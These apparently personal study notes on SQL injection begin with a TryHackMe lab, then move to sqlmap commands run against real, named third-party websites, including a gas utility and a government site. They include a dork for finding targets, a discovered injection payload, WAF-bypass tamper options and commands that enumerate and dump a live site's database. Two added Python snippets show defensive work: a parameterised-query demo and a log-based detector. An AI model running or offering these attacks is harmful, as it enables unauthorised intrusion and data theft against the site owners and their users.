SQL Attack
https://tryhackme.com/room/sqlinjectionlm
The key to discovering error-based SQL injection is to break the application's SQL query by submitting certain characters until an error message is produced; most commonly a single apostrophe ( ' ) or a quotation mark ( " ).
Try typing an apostrophe ( ' ) after id=1 and press Enter. The page returns an SQL error telling you there is a mistake in your syntax. Receiving this error message confirms the existence of an SQL injection vulnerability. We can now exploit this vulnerability and use the error messages to learn more about the database structure.
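As an added illustration (not part of the TryHackMe room), the Python snippet below builds an in-memory SQLite table and shows why the apostrophe probe works: the string-concatenating lookup turns `1'` into a syntax error, while the parameterised lookup treats the same input as an ordinary value that matches nothing. The table, rows and function names are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the lab database: one table looked up by the id parameter.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])

def vulnerable_lookup(user_id):
    """The pattern behind id=1 pages that leak errors: the request value is
    pasted straight into the SQL text, so a stray quote changes the grammar."""
    query = f"SELECT id, name FROM products WHERE id = {user_id}"
    return conn.execute(query).fetchall()

def safe_lookup(user_id):
    """Hardened form: the value is sent as a bound parameter, never as SQL text,
    so a quote is just a character that fails to match any id."""
    return conn.execute("SELECT id, name FROM products WHERE id = ?", (user_id,)).fetchall()

def probe(lookup, value):
    """Report what an error-based probe observes: ('error', message) or ('rows', count)."""
    try:
        return ("rows", len(lookup(value)))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    for value in ("1", "1'"):
        print(f"{value!r:6} vulnerable -> {probe(vulnerable_lookup, value)}")
        print(f"{value!r:6} safe       -> {probe(safe_lookup, value)}")
```

The same syntax error the room has you trigger shows up as the `error` tuple; the hardened version never exposes one.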
SQL MAP
https://www.youtube.com/watch?v=QsMkQMKsIII
Note: after https://www.sngpl.com.pk/, try http://berkeleyrecycling.org
To find vulnerable sites, use the dork: inurl:php?id=1
1) To automate the run (so it won't prompt for yes/no answers), use --batch
2) To specify the technique:
sqlmap -u http://www.abc.com --crawl 3 --technique=U
(U means UNION-based injection; --crawl 3 means crawl the site to a depth of 3)
3) For threads: --threads <n> (used as --threads 5 in the commands below)
4) When the tool can't find vulnerabilities, it can try riskier payloads with --risk. The value can be 1, 2 or 3; raising it from 1 to 3 makes sqlmap test progressively more severe payloads.
5) Likewise, when the tool can't find vulnerabilities we can raise --level to widen the search: at level 2 it also tests the Cookie header for vulnerabilities, and at level 3 it goes into the User-Agent header as well. In other words, we are increasing the range of our testing. Values run from 1 to 5.
One thing to notice is that increasing the level and risk also increases the chance of false positives.
After the scan is completed, we can copy the vulnerable URL in order to exploit it.
6) Verbosity (-v) controls how much detail is shown while looking for vulnerabilities:
2 - shows debugging messages on the screen
3 - shows the payloads being tried
4 - shows the HTTP requests (the form in which they are sent)
5 - shows the response headers
6 - shows the response page's contents
By default, level 1 is selected.
To see HTTP headers.
7) If we have found a vulnerable URL, how do we exploit it or get more details out of it?
I found the vulnerable URL of https://www.sngpl.com.pk/ by writing the command
sqlmap -u https://www.sngpl.com.pk/ --crawl 2 --batch --threads 5 --risk 2 --level 1
For current user
For DB and hostname
The results I got from the txt file:
web application technology: JSP
back-end DBMS: Oracle
Payload: pgids=3605' AND 6330=6330 AND 'yeqQ'='yeqQ&pgname=PAGES_NAME_a&secs=ss7xa852op845&cats=ct456712337&artcl=artuyh709123465
WAF/IPS identified as 'NetScaler AppFirewall (Citrix)'
8) For database details:
sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 -D Oracle --tables --threads 5
Results: no tables found in the Oracle database for sngpl
Those I tried along with the others:
https://www.mohtasibsindh.gov.pk/index.php?id=1
https://www.minddesign.co.uk/show.php?id=174
http://esjindex.org/search.php?id=1
http://www.gdilabs.com/
9) Things I tried to bypass the WAF for the sngpl website:
sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --tamper="between,randomcase,space2comment" -D Oracle --tables
Another command:
sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbms "Oracle" Oracle --schema
https://www.websec.ca/publication/Blog/Bypassing_WAFs_with_SQLMap
https://hacknopedia.com/2022/07/29/sqlmap-tamper-script-collection/
https://securityonline.info/sqlmap-tamper-script-bypassing-waf/
Tamper scripts available for the --tamper option:
apostrophemask.py, apostrophenullencode.py, appendnullbyte.py, base64encode.py, between.py, bluecoat.py, chardoubleencode.py, charencode.py, charunicodeencode.py, concat2concatws.py, equaltolike.py, greatest.py, halfversionedmorekeywords.py, ifnull2ifisnull.py, lowercase.py, modsecurityversioned.py, modsecurityzeroversioned.py, multiplespaces.py, nonrecursivereplacement.py, overlongutf8.py, percentage.py, randomcase.py, randomcomments.py, securesphere.py, sp_password.py, space2comment.py, space2dash.py, space2hash.py, space2morehash.py, space2mssqlblank.py, space2mssqlhash.py, space2mysqlblank.py, space2mysqldash.py, space2plus.py, space2randomblank.py, unionalltounion.py, unmagicquotes.py, varnish.py, versionedkeywords.py, versionedmorekeywords.py
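From the defender's side, the payload shape reported in item 7 and the space2comment/randomcase tampers listed above are what a web server log shows after such a scan. The Python detector below is an added example (not from these notes or from sqlmap): it decodes each request, undoes comment-for-space and mixed-case obfuscation, and flags quote probes, `AND n=n` tautologies, UNION SELECT and a sqlmap User-Agent. The log lines, IPs and User-Agent string are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines; the second mirrors the payload shape from item 7.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.jsp?pgids=3605 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /page.jsp?pgids=3605%27%20AND%206330%3D6330%20AND%20%27yeqQ%27%3D%27yeqQ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /show.php?id=174/**/uNiOn/**/SeLeCt/**/1,2,3 HTTP/1.1" 500 88 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /show.php?id=174 HTTP/1.1" 200 512 "-" "sqlmap/1.x (constructed UA)"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Each indicator is matched against the decoded, de-obfuscated, lower-cased query string.
INDICATORS = {
    "quote_probe": re.compile(r"""['"]"""),
    "numeric_tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b"),
    "string_tautology": re.compile(r"'([^']+)'\s*=\s*'\1"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
}

def normalize(path):
    """Undo URL encoding, the space2comment tamper (/**/ in place of spaces)
    and the randomcase tamper (mixed-case keywords) before matching."""
    query = path.partition("?")[2]
    decoded = unquote_plus(unquote_plus(query))       # double-decode defeats one extra encoding layer
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)      # inline comments become a space
    return re.sub(r"\s+", " ", decoded).lower()

def inspect_line(line):
    """Return the parsed request plus the list of indicators it triggers (None if unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(normalize(m["path"]))]
    if "/*" in m["path"]:                 # comment obfuscation is visible only in the raw path
        hits.append("comment_obfuscation")
    if "sqlmap" in m["ua"].lower():       # default sqlmap UA unless --random-agent was used
        hits.append("scanner_user_agent")
    return {"ip": m["ip"], "path": m["path"], "status": m["status"], "indicators": hits}

def scan_log(lines):
    """One finding per request that shows at least one SQL injection indicator."""
    return [r for r in (inspect_line(l) for l in lines) if r and r["indicators"]]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ", ".join(f["indicators"]), f["path"])
```

Note that the tautology and union checks still fire on the tampered request because matching happens after normalisation, which is the point of decoding before comparing against signatures.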
10) Working on https://www.minddesign.co.uk/show.php?id=174
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --current-user --current-db --hostname --batch
11) For database details:
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --dbs
The database has some default tables in "information_schema".
12) To see tables
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --tables
13) To see all data of any table:
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T modern_cat --dump
14) To see columns and their data types:
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T modern_cat --columns
15) To dump all data:
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --dump-all